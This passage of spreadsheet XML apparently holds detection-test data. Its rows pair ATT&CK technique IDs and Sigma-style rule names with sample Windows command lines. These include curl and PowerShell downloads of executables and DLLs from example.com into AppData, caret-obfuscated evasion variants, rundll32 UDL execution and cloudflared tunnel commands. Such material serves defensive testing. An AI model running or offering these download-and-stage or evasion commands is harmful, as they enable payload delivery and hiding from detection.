          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E495" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri https://example.com -OutFile C:\Users\Public\example.txt -Method GET"</t>
        </is>
      </c>
      <c r="F495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K495" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B496" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C496" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D496" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E496" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="43" t="n"/>
      <c r="J496" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K496" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C497" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D497" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E497" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" -url http://example.com -no-autoupdate</t>
        </is>
      </c>
      <c r="F497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="43" t="n"/>
      <c r="J497" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B498" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_cloudflared</t>
        </is>
      </c>
      <c r="C498" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution</t>
        </is>
      </c>
      <c r="D498" s="43" t="inlineStr">
        <is>
          <t>e0c69ebd-b54f-4aed-8ae3-e3467843f3f0</t>
        </is>
      </c>
      <c r="E498" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" tunnel run -config C:\temp\myconfig.yml --token abcdef123456</t>
        </is>
      </c>
      <c r="F498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I498" s="43" t="n"/>
      <c r="J498" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K498" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B499" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_cloudflared</t>
        </is>
      </c>
      <c r="C499" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution</t>
        </is>
      </c>
      <c r="D499" s="43" t="inlineStr">
        <is>
          <t>e0c69ebd-b54f-4aed-8ae3-e3467843f3f0</t>
        </is>
      </c>
      <c r="E499" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" tunnel run --config C:\temp\myconfig.yml -token abcdef123456</t>
        </is>
      </c>
      <c r="F499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K499" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C500" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D500" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E500" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup --config C:\temp\config.yml --connector-id=ABC123</t>
        </is>
      </c>
      <c r="F500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="43" t="n"/>
      <c r="J500" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K500" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B501" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C501" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D501" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E501" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup --config C:\temp\config.yml --connector-id="ABC-123-DEF"</t>
        </is>
      </c>
      <c r="F501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I501" s="43" t="n"/>
      <c r="J501" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K501" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B502" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C502" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D502" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E502" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup --config C:\temp\config.yml --connector-id=ABC123 --</t>
        </is>
      </c>
      <c r="F502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I502" s="43" t="n"/>
      <c r="J502" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K502" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C503" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D503" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E503" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup --config C:\temp\config.yml --connector-id=ABC123 -v</t>
        </is>
      </c>
      <c r="F503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="43" t="n"/>
      <c r="J503" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K503" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C504" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D504" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E504" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup --config C:\temp\config.yml --connector-id=ABC123 --log-level=debug</t>
        </is>
      </c>
      <c r="F504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I504" s="43" t="n"/>
      <c r="J504" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K504" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C505" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D505" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E505" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel run --token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...</t>
        </is>
      </c>
      <c r="F505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I505" s="43" t="n"/>
      <c r="J505" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C506" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D506" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E506" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe^ tunnel^ run^ --token^ eyJhbGciOiJIUZI1NiIsInR5cCI6IkpXVCJ9...</t>
        </is>
      </c>
      <c r="F506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I506" s="43" t="n"/>
      <c r="J506" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C507" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D507" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E507" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe -tunnel -run --token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...</t>
        </is>
      </c>
      <c r="F507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I507" s="43" t="n"/>
      <c r="J507" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C508" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D508" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E508" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel run --token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... --config=C:\\path\\to\\config.json</t>
        </is>
      </c>
      <c r="F508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I508" s="43" t="n"/>
      <c r="J508" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C509" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D509" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E509" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%AppData%\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H509" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I509" s="43" t="n"/>
      <c r="J509" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K509" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C510" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D510" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E510" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %AppData%\test.exe h^t^t^p^:^/^/example.com/test.exe"</t>
        </is>
      </c>
      <c r="F510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I510" s="43" t="n"/>
      <c r="J510" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C511" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D511" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E511" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%AP^PDATA%\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I511" s="43" t="n"/>
      <c r="J511" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C512" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D512" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E512" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%USERPROFILE%\AppData\Roaming\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I512" s="43" t="n"/>
      <c r="J512" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C513" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D513" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E513" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o test.exe http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="43" t="n"/>
      <c r="J513" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C514" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D514" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E514" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I514" s="43" t="n"/>
      <c r="J514" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C515" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D515" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E515" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^pexample.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I515" s="43" t="n"/>
      <c r="J515" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C516" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D516" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E516" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I516" s="43" t="n"/>
      <c r="J516" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C517" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D517" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E517" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll"</t>
        </is>
      </c>
      <c r="F517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I517" s="43" t="n"/>
      <c r="J517" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C518" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D518" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E518" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IWR -Uri http://example.com/test.dll -OutFile test.dll"</t>
        </is>
      </c>
      <c r="F518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I518" s="43" t="n"/>
      <c r="J518" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C519" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D519" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E519" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I519" s="43" t="n"/>
      <c r="J519" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C520" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D520" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E520" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll" -ExecutionPolicy Bypass</t>
        </is>
      </c>
      <c r="F520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I520" s="43" t="n"/>
      <c r="J520" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C521" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D521" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E521" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll" | Out-Null</t>
        </is>
      </c>
      <c r="F521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I521" s="43" t="n"/>
      <c r="J521" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C522" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D522" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E522" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I522" s="43" t="n"/>
      <c r="J522" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K522" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
